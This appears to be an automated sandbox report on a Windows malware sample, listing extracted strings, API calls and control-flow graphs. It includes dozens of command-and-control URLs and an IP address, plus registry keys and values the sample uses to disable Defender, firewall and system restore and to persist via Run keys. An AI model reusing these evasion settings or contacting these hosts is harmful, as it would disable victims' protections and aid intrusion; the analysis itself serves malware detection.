                                                                                                                                                                                                                          • http://srndndubsbsifurfd.ru/, xrefs: 00403893
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.info/, xrefs: 00403C53
                                                                                                                                                                                                                          • http://fiiauediehduefuge.in/, xrefs: 004039C9
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.biz/, xrefs: 00403A91
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.biz/, xrefs: 00403AF5
                                                                                                                                                                                                                          • m.exe, xrefs: 00403799
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.net/, xrefs: 00403A4B
                                                                                                                                                                                                                          • http://fiiauediehduefuge.ru/, xrefs: 0040389D
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.info/, xrefs: 00403CA3
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.ru/, xrefs: 0040387F
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.biz/, xrefs: 00403C2B
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.net/, xrefs: 00403A0F
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.info/, xrefs: 00403CD5
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.net/, xrefs: 00403B13
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.su/, xrefs: 00403901
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnu.ru/, xrefs: 0040382F
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.com/, xrefs: 00403B1D
                                                                                                                                                                                                                          • %ls\%ls, xrefs: 00403E5C
                                                                                                                                                                                                                          • http://eofihsishihiursgu.biz/, xrefs: 00403B09
                                                                                                                                                                                                                          • DisableBehaviorMonitoring, xrefs: 004043CF
                                                                                                                                                                                                                          • 4950050503930, xrefs: 0040375D
                                                                                                                                                                                                                          • p.exe, xrefs: 004037A3
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.com/, xrefs: 00403B95
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.su/, xrefs: 004038CF
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.com/, xrefs: 00403B27
                                                                                                                                                                                                                          • %ls\94000696690303050, xrefs: 00403E35
                                                                                                                                                                                                                          • %temp%, xrefs: 004037DF
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.ru/, xrefs: 00403875
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.com/, xrefs: 00403B31
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.net/, xrefs: 00403A73
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.info/, xrefs: 00403C49
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.biz/, xrefs: 00403BE5
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.info/, xrefs: 00403C8F
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.net/, xrefs: 004039FB
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.com/, xrefs: 00403B8B
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.biz/, xrefs: 00403BB3
                                                                                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, xrefs: 0040429F
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.net/, xrefs: 00403A37
                                                                                                                                                                                                                          • DisableSR, xrefs: 00404583
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.su/, xrefs: 004038ED
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.su/, xrefs: 004038D9
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.su/, xrefs: 0040395B
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.com/, xrefs: 00403B59
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.biz/, xrefs: 00403BDB
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Security Center\, xrefs: 00404406
                                                                                                                                                                                                                          • http://fiiauediehduefuge.com/, xrefs: 00403B81
                                                                                                                                                                                                                          • DisableOnAccessProtection, xrefs: 00404384
                                                                                                                                                                                                                          • x, xrefs: 00404694
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.biz/, xrefs: 00403BD1
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.ru/, xrefs: 00403861
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.info/, xrefs: 00403C85
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.su/, xrefs: 0040391F
                                                                                                                                                                                                                          • %s%s, xrefs: 00404751
                                                                                                                                                                                                                          • http://fiiauediehduefuge.net/, xrefs: 00403A5F
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.in/, xrefs: 004039DD
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.biz/, xrefs: 00403A87
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.com/, xrefs: 00403B3B
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.biz/, xrefs: 00403ACD
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.net/, xrefs: 00403A19
                                                                                                                                                                                                                          • http://fiiauediehduefuge.su/, xrefs: 00403933
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.in/, xrefs: 004039F1
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.ru/, xrefs: 004038A7
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.net/, xrefs: 00403A55
                                                                                                                                                                                                                          • http://eofihsishihiursgu.net/, xrefs: 00403A7D
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.biz/, xrefs: 00403A9B
                                                                                                                                                                                                                          • AntiVirusDisableNotify, xrefs: 00403807
                                                                                                                                                                                                                          • Microsoft Windows Services, xrefs: 00403780
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.biz/, xrefs: 00403AA5
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.biz/, xrefs: 00403AD7
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.in/, xrefs: 004039AB
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.biz/, xrefs: 00403C21
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.info/, xrefs: 00403C7B
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.biz/, xrefs: 00403AB9
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.su/, xrefs: 00403929
                                                                                                                                                                                                                          • FirewallDisableNotify, xrefs: 00403825
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.in/, xrefs: 00403983
                                                                                                                                                                                                                          • x, xrefs: 0040463F
                                                                                                                                                                                                                          • winsvcs.exe, xrefs: 00403770
                                                                                                                                                                                                                          • %userprofile%, xrefs: 004037CB
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.biz/, xrefs: 00403AC3
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.com/, xrefs: 00403B6D
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.biz/, xrefs: 00403BC7
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.ru/, xrefs: 00403889
                                                                                                                                                                                                                          • DisableAntiSpyware, xrefs: 00404280
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.su/, xrefs: 00403915
                                                                                                                                                                                                                          • DisableScanOnRealtimeEnable, xrefs: 00404339
                                                                                                                                                                                                                          • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\, xrefs: 00404154
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.info/, xrefs: 00403C5D
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.info/, xrefs: 00403C99
                                                                                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, xrefs: 004042C9
                                                                                                                                                                                                                          • DisableBehaviorMonitoring, xrefs: 004043A2
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.biz/, xrefs: 00403AE1
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.info/, xrefs: 00403CB7
                                                                                                                                                                                                                          • s.exe, xrefs: 004037AD
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.net/, xrefs: 00403A69
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.biz/, xrefs: 00403BEF
                                                                                                                                                                                                                          • o.exe, xrefs: 004037B7
                                                                                                                                                                                                                          • t.exe, xrefs: 0040378F
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.net/, xrefs: 00403A23
                                                                                                                                                                                                                          • DisableOnAccessProtection, xrefs: 00404357
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Security Center\Svc\, xrefs: 004044B4
                                                                                                                                                                                                                          • %appdata%, xrefs: 004037D5
                                                                                                                                                                                                                          • http://eofihsishihiursgu.su/, xrefs: 00403951
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.in/, xrefs: 00403979
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.net/, xrefs: 00403A05
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.biz/, xrefs: 00403AFF
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.info/, xrefs: 00403C71
                                                                                                                                                                                                                          • AutoUpdateDisableNotify, xrefs: 0040381B
                                                                                                                                                                                                                          • http://eofihsishihiursgu.ru/, xrefs: 004038BB
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.su/, xrefs: 004038E3
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.com/, xrefs: 00403B63
                                                                                                                                                                                                                          • http://fiiauediehduefuge.info/, xrefs: 00403CAD
                                                                                                                                                                                                                          • DisableAntiSpyware, xrefs: 00404253
                                                                                                                                                                                                                          • UpdatesDisableNotify, xrefs: 00403811
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.ru/, xrefs: 0040386B
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.com/, xrefs: 00403B45
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.biz/, xrefs: 00403BBD
                                                                                                                                                                                                                          • UpdatesOverride, xrefs: 004037F3
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.com/, xrefs: 00403B4F
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.biz/, xrefs: 00403BF9
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00403FD3
                                                                                                                                                                                                                          • AntiVirusOverride, xrefs: 004037E9
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.ru/, xrefs: 00403843
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.com/, xrefs: 00403B77
                                                                                                                                                                                                                          • %ls:*:Enabled:%s, xrefs: 00403EEF
                                                                                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\, xrefs: 004042E7
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.info/, xrefs: 00403CC1
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.info/, xrefs: 00403C67
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.in/, xrefs: 004039D3
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.in/, xrefs: 004039A1
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.in/, xrefs: 00403997
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.biz/, xrefs: 00403AAF
                                                                                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows Defender\, xrefs: 0040422E
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.su/, xrefs: 0040390B
                                                                                                                                                                                                                          • %ls:Zone.Identifier, xrefs: 00403D79
                                                                                                                                                                                                                          • http://eofihsishihiursgu.com/, xrefs: 00403B9F
                                                                                                                                                                                                                          • http://eofihsishihiursgu.biz/, xrefs: 00403C35
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.ru/, xrefs: 00403857
                                                                                                                                                                                                                          • DisableScanOnRealtimeEnable, xrefs: 0040430C
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.net/, xrefs: 00403A2D
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.net/, xrefs: 00403A41
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.su/, xrefs: 004038F7
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.su/, xrefs: 0040393D
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.su/, xrefs: 00403947
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\, xrefs: 00404562
                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040407E
                                                                                                                                                                                                                          • http://eofihsishihiursgu.in/, xrefs: 004039E7
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.biz/, xrefs: 00403C0D
                                                                                                                                                                                                                          • http://eofihsishihiursgu.info/, xrefs: 00403CCB
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.in/, xrefs: 004039B5
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.biz/, xrefs: 00403C03
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.ru/, xrefs: 0040384D
                                                                                                                                                                                                                          • DisableSR, xrefs: 004045B0
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.com/, xrefs: 00403BA9
                                                                                                                                                                                                                          • http://92.63.197.48/, xrefs: 00403839
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.in/, xrefs: 0040398D
                                                                                                                                                                                                                          • FirewallOverride, xrefs: 004037FD
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.biz/, xrefs: 00403C3F
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.in/, xrefs: 00403965
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.in/, xrefs: 0040396F
                                                                                                                                                                                                                          • http://fiiauediehduefuge.biz/, xrefs: 00403AEB
                                                                                                                                                                                                                          • %windir%, xrefs: 004037C1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$FileSleep_snwprintf$ExitModuleProcess$AddressCreateDeleteEnvironmentErrorExistsExpandHandleLastMutexNamePathProcStrings
                                                                                                                                                                                                                          • String ID: %appdata%$%ls:*:Enabled:%s$%ls:Zone.Identifier$%ls\%ls$%ls\94000696690303050$%s%s$%temp%$%userprofile%$%windir%$4950050503930$AntiVirusDisableNotify$AntiVirusOverride$AutoUpdateDisableNotify$DisableAntiSpyware$DisableAntiSpyware$DisableBehaviorMonitoring$DisableBehaviorMonitoring$DisableOnAccessProtection$DisableOnAccessProtection$DisableSR$DisableSR$DisableScanOnRealtimeEnable$DisableScanOnRealtimeEnable$FirewallDisableNotify$FirewallOverride$Microsoft Windows Services$SOFTWARE\Microsoft\Security Center\$SOFTWARE\Microsoft\Security Center\Svc\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SOFTWARE\Policies\Microsoft\Windows Defender\$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesOverride$http://92.63.197.48/$http://afeifieuuufufufuf.biz/$http://afeifieuuufufufuf.biz/$http://afeifieuuufufufuf.com/$http://afeifieuuufufufuf.in/$http://afeifieuuufufufuf.info/$http://afeifieuuufufufuf.net/$http://afeifieuuufufufuf.ru/$http://afeifieuuufufufuf.su/$http://aiiaiafrzrueuedur.biz/$http://aiiaiafrzrueuedur.biz/$http://aiiaiafrzrueuedur.com/$http://aiiaiafrzrueuedur.in/$http://aiiaiafrzrueuedur.info/$http://aiiaiafrzrueuedur.net/$http://aiiaiafrzrueuedur.ru/$http://aiiaiafrzrueuedur.su/$http://eiifngjfksisiufjf.biz/$http://eiifngjfksisiufjf.biz/$http://eiifngjfksisiufjf.com/$http://eiifngjfksisiufjf.in/$http://eiifngjfksisiufjf.info/$http://eiifngjfksisiufjf.net/$http://eiifngjfksisiufjf.ru/$http://eiifngjfksisiufjf.su/$http://eofihsishihiursgu.biz/$http://eofihsishihiursgu.biz/$http://eofihsishihiursgu.com/$http://eofihsishihiursgu.in/$http://eofihsishihiursgu.info/$http://eofihsishihiursgu.net/$http://eofihsishihiursgu.ru/$http://eofihsishihiursgu.su/$http://eoroooskfogihisrg.biz/$http://eoroooskfogihisrg.biz/$http://eoroooskfogihisrg.com/$http://eoroooskfogihisrg.in/$http://eoroooskfogihisrg.info/$http://eoroooskfogihisrg.net/$http://eoroooskfogihisrg.ru/$http://eoroooskfogihisrg.su/$http://fifiehsueuufidhfi.biz/$http://fifiehsueuufidhfi.biz/$http://fifiehsueuufidhfi.com/$http://fifiehsueuufidhfi.in/$http://fifiehsueuufidhfi.info/$http://fifiehsueuufidhfi.net/$http://fifiehsueuufidhfi.ru/$http://fifiehsueuufidhfi.su/$http://fiiauediehduefuge.biz/$http://fiiauediehduefuge.biz/$http://fiiauediehduefuge.com/$http://fiiauediehduefuge.in/$http://fiiauediehduefuge.info/$http://fiiauediehduefuge.net/$http://fiiauediehduefuge.ru/$http://fiiauediehduefuge.su/$http://fuaiuebndieufeufu.biz/$http://fuaiuebndieufeufu.biz/$http://fuaiuebndieufeufu.com/$http://fuaiuebndieufeufu.in/$http://fuaiuebndieufeufu.info/$http://fuaiuebndieufeufu.net/$http://fuaiuebndieufeufu.ru/$http://fuaiuebndieufeufu.su/$http://iuirshriuisruruuf.biz/$http://iuirshriuisruruuf.biz/$http://iuirshriuisruruuf.com/$http://iuirshriuisruruuf.in/$http://iuirshriuisruruuf.info/$http://iuirshriuisruruuf.net/$http://iuirshriuisruruuf.ru/$http://iuirshriuisruruuf.su/$http://nnososoosjfeuhueu.biz/$http://nnososoosjfeuhueu.com/$http://nnososoosjfeuhueu.in/$http://nnososoosjfeuhueu.info/$http://nnososoosjfeuhueu.net/$http://nnososoosjfeuhueu.ru/$http://nnososoosjfeuhueu.su/$http://noeuaoenriusfiruu.biz/$http://noeuaoenriusfiruu.biz/$http://noeuaoenriusfiruu.com/$http://noeuaoenriusfiruu.in/$http://noeuaoenriusfiruu.info/$http://noeuaoenriusfiruu.net/$http://noeuaoenriusfiruu.ru/$http://noeuaoenriusfiruu.su/$http://nousiieiffgogogoo.biz/$http://nousiieiffgogogoo.biz/$http://nousiieiffgogogoo.com/$http://nousiieiffgogogoo.in/$http://nousiieiffgogogoo.info/$http://nousiieiffgogogoo.net/$http://nousiieiffgogogoo.ru/$http://nousiieiffgogogoo.su/$http://slpsrgpsrhojifdij.biz/$http://slpsrgpsrhojifdij.biz/$http://slpsrgpsrhojifdij.com/$http://slpsrgpsrhojifdij.in/$http://slpsrgpsrhojifdij.info/$http://slpsrgpsrhojifdij.net/$http://slpsrgpsrhojifdij.ru/$http://slpsrgpsrhojifdij.su/$http://srndndubsbsifurfd.biz/$http://srndndubsbsifurfd.biz/$http://srndndubsbsifurfd.com/$http://srndndubsbsifurfd.in/$http://srndndubsbsifurfd.info/$http://srndndubsbsifurfd.net/$http://srndndubsbsifurfd.ru/$http://srndndubsbsifurfd.su/$http://ssofhoseuegsgrfnj.biz/$http://ssofhoseuegsgrfnj.biz/$http://ssofhoseuegsgrfnj.com/$http://ssofhoseuegsgrfnj.in/$http://ssofhoseuegsgrfnj.info/$http://ssofhoseuegsgrfnj.net/$http://ssofhoseuegsgrfnj.su/$http://ssofhoseuegsgrfnu.ru/$m.exe$o.exe$p.exe$s.exe$t.exe$winsvcs.exe$x$x
                                                                                                                                                                                                                          • API String ID: 2238563751-1929099517
                                                                                                                                                                                                                          • Opcode ID: 24f9d2943bb522b9733b909b534f321aa1f7c089defa5e5c4731006e04a00fd0
                                                                                                                                                                                                                          • Instruction ID: 998e279ab630b6434e1c0101dc3529ca0b686cab9416bf1021e7191076eb0e73
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24f9d2943bb522b9733b909b534f321aa1f7c089defa5e5c4731006e04a00fd0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43923DB0A407699EEF20DF50DD49BDAB7B4FB04705F0080EAE249BA1D1C7B85A84CF59

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 406 403db3-403dc7 408 403ed6-403f1a Sleep _snwprintf 406->408 409 403dcd-403e84 memset * 3 ExpandEnvironmentStringsW _snwprintf * 2 PathFileExistsW 406->409 412 403f20-403f39 408->412 410 403e86 409->410 411 403e8a-403e99 PathFileExistsW 409->411 410->408 413 403eaa-403ec2 CopyFileW 411->413 414 403e9b-403ea4 CreateDirectoryW 411->414 415 403f83-403f88 412->415 416 403f3b-403f43 412->416 420 403ec4 413->420 421 403ec6-403ecb Sleep 413->421 414->413 417 403f8e-403fa1 415->417 418 403f45-403f60 416->418 419 403f7a-403f81 416->419 423 403fa7-403fe5 SetFileAttributesW * 2 RegOpenKeyExW 417->423 424 40413b-404166 Sleep RegOpenKeyExW 417->424 418->415 422 403f62-403f78 418->422 419->417 420->408 420->421 422->412 422->419 425 404070-404090 RegOpenKeyExW 423->425 426 403feb-404000 423->426 427 404220-404240 RegOpenKeyExW 424->427 428 40416c-404199 RegQueryValueExW 424->428 429 404096-4040ab 425->429 430 40411b-404135 call 40206e Sleep ExitProcess 425->430 435 404006-404025 426->435 433 404246-404271 RegQueryValueExW 427->433 434 4043f8-404418 RegOpenKeyExW 427->434 431 404214-40421a RegCloseKey 428->431 432 40419b-4041b0 428->432 436 4040b1-4040d0 429->436 431->427 437 4041b6-4041d5 432->437 441 404291-4042b1 RegOpenKeyExW 433->441 442 404273-40428b RegSetValueExW 433->442 438 4044a6-4044c6 RegOpenKeyExW 434->438 439 40441e-404425 434->439 435->435 443 404027-40406a RegSetValueExW RegCloseKey 435->443 436->436 444 4040d2-404115 RegSetValueExW RegCloseKey 436->444 437->437 445 4041d7-40420e RegSetValueExW 437->445 450 404554-404574 RegOpenKeyExW 438->450 451 4044cc-4044d3 438->451 446 404434-40443b 439->446 448 4042b3-4042d3 RegCreateKeyExA 441->448 449 4042d9-4042f9 RegOpenKeyExW 441->449 442->441 443->425 444->430 445->431 454 40449a-4044a0 RegCloseKey 446->454 455 40443d-404470 RegQueryValueExW 446->455 448->449 456 4043ec-4043f2 RegCloseKey 449->456 457 4042ff-40432a RegQueryValueExW 449->457 452 404576-4045a1 RegQueryValueExW 450->452 453 4045cd-404602 Sleep CreateThread Sleep call 401fac 450->453 458 4044e2-4044e9 451->458 459 4045c1-4045c7 RegCloseKey 452->459 460 4045a3-4045bb RegSetValueExW 452->460 475 404604-404630 Sleep CreateThread Sleep 453->475 476 40466b-404670 Sleep 453->476 454->438 462 404472-404492 RegSetValueExW 455->462 463 404498 455->463 456->434 464 40434a-404375 RegQueryValueExW 457->464 465 40432c-404344 RegSetValueExW 457->465 466 404548-40454e RegCloseKey 458->466 467 4044eb-40451e RegQueryValueExW 458->467 459->453 460->459 462->463 463->446 470 404395-4043c0 RegQueryValueExW 464->470 471 404377-40438f RegSetValueExW 464->471 465->464 466->450 472 404520-404540 RegSetValueExW 467->472 473 404546 467->473 477 4043e0-4043e6 RegCloseKey 470->477 478 4043c2-4043da RegSetValueExW 470->478 471->470 472->473 473->458 480 40463f-404646 475->480 479 404676-40469b Sleep 476->479 477->456 478->477 483 4046a1-404707 Sleep memset _snprintf call 401cda Sleep 479->483 484 4047a2 479->484 480->476 482 404648-404669 Sleep call 401cda 480->482 482->480 490 404716-40471d 483->490 484->479 491 40479d 490->491 492 40471f-40477c Sleep memset _snprintf call 401674 490->492 491->484 495 404798 492->495 496 40477e-404792 CreateThread 492->496 495->490 496->495
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DF1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E07
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00403E28
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403E46
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403E6D
                                                                                                                                                                                                                          • PathFileExistsW.KERNELBASE(?), ref: 00403E7C
                                                                                                                                                                                                                          • PathFileExistsW.KERNELBASE(?), ref: 00403E91
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00403EA4
                                                                                                                                                                                                                          • CopyFileW.KERNELBASE(?,?,00000000), ref: 00403EBA
                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 00403EDB
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403F00
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000007), ref: 00403FB0
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000007), ref: 00403FBF
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00403FDD
                                                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,?), ref: 0040405E
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040406A
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00404088
                                                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,?), ref: 00404109
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 00404115
                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 0040412D
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00404135
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00403FD3
                                                                                                                                                                                                                          • %ls\94000696690303050, xrefs: 00403E35
                                                                                                                                                                                                                          • %ls:*:Enabled:%s, xrefs: 00403EEF
                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040407E
                                                                                                                                                                                                                          • %ls\%ls, xrefs: 00403E5C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$_snwprintfmemset$AttributesCloseExistsOpenPathSleepValue$CopyCreateDirectoryEnvironmentExitExpandProcessStrings
                                                                                                                                                                                                                          • String ID: %ls:*:Enabled:%s$%ls\%ls$%ls\94000696690303050$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                                                                                                                                                                                                          • API String ID: 2527662941-1033523944
                                                                                                                                                                                                                          • Opcode ID: aa45970d3a88e3b37704e50bb6eb27db35af4ab28b81ce86dd9b2f03af53a582
                                                                                                                                                                                                                          • Instruction ID: f988062a3cac2b408eb3252422939997e0dc03c7f21b39b6b4153b48e23d4fb2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa45970d3a88e3b37704e50bb6eb27db35af4ab28b81ce86dd9b2f03af53a582
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98812675A002699EDB20DB54CC49BDAB3B8FB08305F0041EAF649F6191EB749AD4CF99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 549 40104e-4010c3 __set_app_type __p__fmode __p__commode call 4011cd 552 4010d1-401128 call 4011b8 _initterm __getmainargs _initterm 549->552 553 4010c5-4010d0 __setusermatherr 549->553 556 401164-401167 552->556 557 40112a-401132 552->557 553->552 558 401141-401145 556->558 559 401169-40116d 556->559 560 401134-401136 557->560 561 401138-40113b 557->561 563 401147-401149 558->563 564 40114b-40115c GetStartupInfoA 558->564 559->556 560->557 560->561 561->558 562 40113d-40113e 561->562 562->558 563->562 563->564 565 40115e-401162 564->565 566 40116f-401171 564->566 567 401172-40117d GetModuleHandleA call 40373e 565->567 566->567 569 401182-40119f exit _XcptFilter 567->569
